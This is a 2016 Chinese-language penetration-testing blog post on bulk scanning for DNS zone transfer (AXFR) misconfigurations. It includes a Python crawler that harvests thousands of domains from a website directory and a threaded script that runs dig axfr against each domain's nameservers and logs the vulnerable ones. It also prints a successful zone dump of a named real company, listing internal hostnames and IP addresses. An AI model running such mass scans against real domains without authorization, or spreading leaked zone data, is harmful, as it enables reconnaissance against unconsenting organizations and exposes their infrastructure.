cdxy.me
Cyber Security / Data Science / Trading

DNS zone transfer vulnerability(域传送漏洞)批量扫描

[Penetration Testing]

2016-03-11 08:46:12 cdxy dns,DNS zone transfer,DNS域传送

DNS zone transfer vulnerability(域传送漏洞)批量扫描

原理自行百度,我们直接动手

 

工具

DNS域传送漏洞的验证方式简单粗暴,我简单修改了lijiejie大牛的脚本,做批量: https://github.com/Xyntax/zZone-Transfer

项目结构

采集

采集自http://www.qkankan.com

输入为qkankan.com的某栏目url 如下例:国内网站列表 http://www.qkankan.com/guonei/all/

import re
import urllib

"""
url采集脚本
仅适用于此站点的list,自动翻页采集
http://www.qkankan.com/
"""

def getHtml(url):
    print "hello cdxy\n\ntesting page 1"
    page = urllib.urlopen(url)
    html = page.read()
    for i in range(2,10000):
        page = urllib.urlopen(url+'/index_'+str(i)+'.html')
        current_html = page.read()
        if 'message.gif' not in current_html:
            html+=current_html
            print "gathering urls from page:"+str(i)
        else:
            print "\ntotal_page: "+str(i-1)
            break

    return html

def getUrl(html):
    reg = r'http://(.*?)(/|\"|\')' #正则
    urlre = re.compile(reg)
    urllist = re.findall(urlre,html)
    return urllist      

html = getHtml("http://www.qkankan.com/guonei/all/") #地址输入
ans = getUrl(html)

fobj = open('target_list.txt','w') #输出位置
ans_list = []
white_list = ['www.w3.org','www.qkankan.com','m.qkankan.com'] #白名单,不作采集
for each in ans:
    if each[0] not in ans_list and each[0] not in white_list:
        ans_list.append(each[0])
        fobj.write(each[0]+'\n')
fobj.close()

print "\nOver!\nURLs:" + str(len(ans_list))

验证

简单的验证脚本 windows下使用nslookup验证

import threading
import os
import re

urls = []

fobj = open('target_list.txt')
for eachline in fobj.readlines():
    urls.append(eachline)

lock = threading.Lock()
c_index = 0

def test_DNS_Servers():
    global c_index
    while True:
        lock.acquire()
        if c_index >= len(urls):
            lock.release()
            break    # End of list
        domain = urls[c_index].lstrip('www.')

        print "---testing:" + domain

        c_index += 1
        lock.release()
        cmd_res = os.popen('nslookup -type=ns ' + domain).read()    # fetch DNS Server List
        dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
        for server in dns_servers:
            if len(server) < 5: server += domain
            cmd_res = os.popen(os.getcwd() + '\\BIND9\\dig @%s axfr %s' % (server, domain)).read()
            if cmd_res.find('Transfer failed.') < 0 and \
               cmd_res.find('connection timed out') < 0 and \
               cmd_res.find('XFR size') > 0 :
                lock.acquire()
                print '*' * 10 +  ' Vulnerable dns server found:', server, '*' * 10
                lock.release()
                with open('vulnerable_hosts.txt', 'a') as f:
                    f.write('%s    %s\n' % (server.ljust(30), domain))
                with open('dns\\' + server + '.txt', 'w') as f:
                    f.write(cmd_res)

threads = []
for i in range(10):
    t = threading.Thread(target=test_DNS_Servers)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

print 'All Done!'

利用

> .\BIND9\dig.exe @dns01.benq.com axfr benq.com

; <<>> DiG 9.9.5-W1 <<>> @dns01.benq.com axfr benq.com
; (1 server found)
;; global options: +cmd
benq.com.       3600    IN  SOA dns01.benq.com. hostmaster.benq.com. 2004 900 600 259200 3600
benq.com.       3600    IN  A   210.65.248.241
benq.com.       3600    IN  A   23.97.76.217
benq.com.       3600    IN  NS  dns01.benq.com.
benq.com.       3600    IN  NS  dns11.benq.com.
benq.com.       3600    IN  MX  100 imss3.benq.com.
benq.com.       3600    IN  MX  100 imss5.benq.com.
benq.com.       3600    IN  MX  10 imss1.benq.com.
benq.com.       3600    IN  MX  10 imss2.benq.com.
benq.com.       3600    IN  TXT "v=spf1 mx include:_spf-a.benq.com include:_spf-b.benq.com include:_spf-c.benq.com ~all"
benq.com.       3600    IN  TXT "google-site-verification=ibNFzPkik8Va-94fzlu8pBhyajsZ4n77UYuj1rKOLO0"
_spf-a.benq.com.    3600    IN  TXT "v=spf1 ip4:211.78.86.204 ip4:59.125.164.210 ip4:210.65.248.202 ip4:220.128.63.37 ip4:210.65.248.203 ip4:74.10.50.12 ip4:74.11.113.23 ~all"
_spf-b.benq.com.    3600    IN  TXT "v=spf1 ip4:218.4.236.13 ip4:218.4.236.28 ip4:220.128.64.142 ip4:217.21.255.99 ip4:62.2.173.100 ip4:84.233.242.228 ip4:80.252.92.141 ip4:218.4.236.4 ip4:218.4.236.27 ~all"
_spf-c.benq.com.    3600    IN  TXT "v=spf1 ip4:68.225.24.150 ip4:210.65.248.207 ip4:220.128.63.118 ip4:210.65.248.206 ~all"
_autodiscover._tcp.benq.com. 3600 IN    SRV 0 0 443 roh.benq.com.
_sipfederationtls._tcp.benq.com. 3600 IN SRV    0 0 5061 sip.benq.com.
_sip._tls.benq.com. 3600    IN  SRV 0 0 443 sip.benq.com.
abs.benq.com.       3600    IN  A   219.87.79.218
ae.benq.com.        3600    IN  A   220.128.63.69
algeria.benq.com.   3600    IN  A   220.228.13.31
ap.benq.com.        3600    IN  CNAME   newbqp-multi.cloudapp.net.
ap-preview.benq.com.    3600    IN  CNAME   newbqp-multi.cloudapp.net.
...
...
benq.com.       3600    IN  SOA dns01.benq.com. hostmaster.benq.com. 2004 900 600 259200 3600
;; Query time: 173 msec
;; SERVER: 220.128.63.23#53(220.128.63.23)
;; WHEN: Thu Mar 10 23:44:13 中国标准时间 2016
;; XFR size: 500 records (messages 2, bytes 18395)